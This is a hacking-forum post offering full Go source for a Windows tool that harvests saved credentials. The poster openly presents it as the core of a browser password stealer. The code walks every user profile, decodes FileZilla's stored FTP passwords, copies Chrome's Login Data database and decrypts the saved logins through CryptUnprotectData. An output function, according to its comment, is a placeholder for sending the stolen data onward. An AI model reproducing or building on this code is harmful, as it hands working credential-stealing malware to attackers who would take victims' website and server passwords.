Chrome and FTPRecover [Source]

fernandopassword

Social Buzz Creator

Rep

Vouches

Posts

168

Likes

Bits

2 MONTHS

2 2 MONTHS OF SERVICE

LEVEL 2 800 XP

OP
Feb 20, 2025
0

0

Hello Guys, I think everyone here knows the Idea behind an Browser Password Stealer... But for who don't know:
It's a software that open the place that your favorite browser saves the password, decrypt it and send to wherever you want.
Today I'm not going to show how to create an stealer, but, how to create an recovery program (that you can use to make your own stealer) for Chrome and FileZilla.
The language that I'll use is Golang, so you need to install https://golang.org/
The main Section is pretty simple
main.go

Code:

package main
func main() {
procura()
juntar("****FTP****")
for i := 0; i < len(users); i++ {
filezilla(users)
}
juntar("****Chrome****")
chrome()
}

filezilla.go

Code:

package main
import (
"encoding/base64"
"encoding/xml"
"io/ioutil"
)
func filezilla(tratado string) {
conteudo, erro := ioutil.ReadFile(tratado + "\\AppData\\Roaming\\FileZilla\\sitemanager.xml")
if erro != nil {
//juntar("Na Pasta do", usuario, "Arquivo n existe")
} else {
var arq xmlfilezilla
var tamanho int
xml.Unmarshal(conteudo, &arq)
tamanho = len(arq.Host)
for i := 0; i < tamanho; i++ {
juntar("Host:", arq.Host)
juntar("Porta:", arq.Port)
juntar("Usuario:", arq.User)
sembase, nebase := base64.StdEncoding.DecodeString(arq.Pass)
if nebase == nil {
juntar("Senha:", string(sembase))
} else {
juntar("Senha:", nebase)
}
}
}
//tratar conteudo
}

chrome.go

Code:

//Chrome Password Recovery project main.go
//Recover Websites, Username and Passwords from Google Chromes Login Data file.
//Windows Only
//SQLLite3 - github.com/mattn/go-sqlite3
//Using Crypt32.dll (win32crypt) for decryption
//C:\Users\{USERNAME}\AppData\Local\Google\Chrome\User Data\Default
package main
import (
"database/sql"
//"fmt"
"io"
"log"
"os"
"syscall"
"unsafe"
_ "github.com/mattn/go-sqlite3"
)
var (
dllcrypt32  = syscall.NewLazyDLL("Crypt32.dll")
dllkernel32 = syscall.NewLazyDLL("Kernel32.dll")
procDecryptData = dllcrypt32.NewProc("CryptUnprotectData")
procLocalFree   = dllkernel32.NewProc("LocalFree")
dataPath string = os.Getenv("USERPROFILE") + "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
)
type DATA_BLOB struct {
cbData uint32
pbData *byte
}
func NewBlob(d []byte) *DATA_BLOB {
if len(d) == 0 {
return &DATA_BLOB{}
}
return &DATA_BLOB{
pbData: &d[0],
cbData: uint32(len(d)),
}
}
func (b *DATA_BLOB) ToByteArray() []byte {
d := make([]byte, b.cbData)
copy(d, (*[1 << 30]byte)(unsafe.Pointer(b.pbData))[:])
return d
}
func Decrypt(data []byte) ([]byte, error) {
var outblob DATA_BLOB
r, _, err := procDecryptData.Call(uintptr(unsafe.Pointer(NewBlob(data))), 0, 0, 0, 0, 0, uintptr(unsafe.Pointer(&outblob)))
if r == 0 {
return nil, err
}
defer procLocalFree.Call(uintptr(unsafe.Pointer(outblob.pbData)))
return outblob.ToByteArray(), nil
}
func copyFileToDirectory(pathSourceFile string, pathDestFile string) error {
sourceFile, err := os.Open(pathSourceFile)
if err != nil {
return err
}
defer sourceFile.Close()
destFile, err := os.Create(pathDestFile)
if err != nil {
return err
}
defer destFile.Close()
_, err = io.Copy(destFile, sourceFile)
if err != nil {
return err
}
err = destFile.Sync()
if err != nil {
return err
}
sourceFileInfo, err := sourceFile.Stat()
if err != nil {
return err
}
destFileInfo, err := destFile.Stat()
if err != nil {
return err
}
if sourceFileInfo.Size() == destFileInfo.Size() {
} else {
return err
}
return nil
}
func checkFileExist(filePath string) bool {
if _, err := os.Stat(filePath); os.IsNotExist(err) {
return false
} else {
return true
}
}
func chrome() {
//Check for Login Data file
if !checkFileExist(dataPath) {
os.Exit(0)
}
//Copy Login Data file to temp location
err := copyFileToDirectory(dataPath, os.Getenv("APPDATA")+"\\tempfile.dat")
if err != nil {
log.Fatal(err)
}
//Open Database
db, err := sql.Open("sqlite3", os.Getenv("APPDATA")+"\\tempfile.dat")
if err != nil {
log.Fatal(err)
}
defer db.Close()
//Select Rows to get data from
rows, err := db.Query("select origin_url, username_value, password_value from logins")
if err != nil {
log.Fatal(err)
}
defer rows.Close()
for rows.Next() {
var URL string
var USERNAME string
var PASSWORD string
err = rows.Scan(&URL, &USERNAME, &PASSWORD)
if err != nil {
log.Fatal(err)
}
//Decrypt Passwords
pass, err := Decrypt([]byte(PASSWORD))
if err != nil {
log.Fatal(err)
}
//Check if no value, if none skip
if URL != "" && URL != "" && string(pass) != "" {
juntar(URL, USERNAME, string(pass))
}
}
err = rows.Err()
if err != nil {
log.Fatal(err)
}
}

utilidades.go

Code:

package main
import (
"encoding/xml"
"fmt"
"io/ioutil"
"os"
)
//o passo a passo vai ser enumerar usuÃ¡rios, pegar do filezilla e do winscp
//preciso substituir os prints para arquivo
type xmlfilezilla struct {
XMLNAME xml.Name `xml:"FileZilla3"`
Host    []string `xml:"Servers>Server>Host"`
Port    []string `xml:"Servers>Server>Port"`
User    []string `xml:"Servers>Server>User"`
Pass    []string `xml:"Servers>Server>Pass"`
}
var users []string
var pastadouser string
func procura() {
pasta := os.Getenv("HOMEDRIVE")
raiz, _ := ioutil.ReadDir(pasta + "\\Users") //essa Ã© a soluÃ§Ã£o mais porca possivel, visto que o windows nÃ£o tem suporte pro lookgroups
for _, user := range raiz {
//juntar(user.Name())
if user.IsDir() {
pastadouser = pasta + "\\Users\\" + user.Name()
users = append(users, pastadouser)
//filezilla(pastadouser)
//juntar(users)
}
}
}
//funÃ§Ã£o de holder para tratar o envio de arquivos, inicialmente pode ser somente um print
//ela vai fazer um array com todas as informaÃ§Ãµes para depois printar tudo
func juntar(a ...interface{}) {
fmt.Println(a)
}

After creating these 4 files, just go to the dir and run go build
that's it. Sorry for Portuguese comments in code and for my bad english, but, I'm without time to translate...
Any doubt Pm me or message me on Telegram:
@

Chrome and FTPRecover [Source]

More options

fernandopassword

452,523

358,221

358,278